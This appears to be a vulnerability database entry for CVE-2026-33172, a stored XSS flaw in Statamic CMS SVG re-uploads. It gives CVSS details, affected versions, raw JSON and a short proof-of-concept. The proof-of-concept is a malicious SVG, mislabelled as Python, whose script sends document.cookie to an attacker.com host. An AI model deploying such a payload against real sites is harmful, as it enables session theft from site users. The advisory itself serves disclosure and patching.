Security Vulnerability Report
中文
CVE-2026-33172 CVSS 8.7 HIGH

CVE-2026-33172

Published: 2026-03-20 22:16:29
Last Modified: 2026-03-23 18:46:05
Source: [email protected]

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, a stored XSS vulnerability in SVG asset reuploads allows authenticated users with asset upload permissions to bypass SVG sanitization and inject malicious JavaScript that executes when the asset is viewed. This has been fixed in 5.73.14 and 6.7.0.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE
Statamic CMS < 5.73.14
Statamic CMS < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-33172: Stored XSS via SVG upload --> <!-- Attacker creates a malicious SVG file and uploads it as an asset --> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" /> <script type="text/javascript"> alert('CVE-2026-33172 XSS Executed'); // Malicious actions can be performed here, e.g., stealing cookies fetch('https://attacker.com/steal?cookie=' + document.cookie); </script> </svg>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33172", "sourceIdentifier": "[email protected]", "published": "2026-03-20T22:16:28.973", "lastModified": "2026-03-23T18:46:04.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, a stored XSS vulnerability in SVG asset reuploads allows authenticated users with asset upload permissions to bypass SVG sanitization and inject malicious JavaScript that executes when the asset is viewed. This has been fixed in 5.73.14 and 6.7.0."}, {"lang": "es", "value": "Statamic es un sistema de gestión de contenido (CMS) impulsado por Laravel y Git. Antes de las versiones 5.73.14 y 6.7.0, una vulnerabilidad de XSS almacenado en las recargas de activos SVG permite a usuarios autenticados con permisos de carga de activos eludir la sanitización de SVG e inyectar JavaScript malicioso que se ejecuta cuando se visualiza el activo. Esto ha sido corregido en 5.73.14 y 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.14", "matchCriteriaId": "23CF5975-D5BE-4138-AE2F-95F7BBE00F20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.0", "matchCriteriaId": "6B99B257-0FC1-4CF9-B006-8AEC17235BC8"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-7rcv-55mj-chg7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.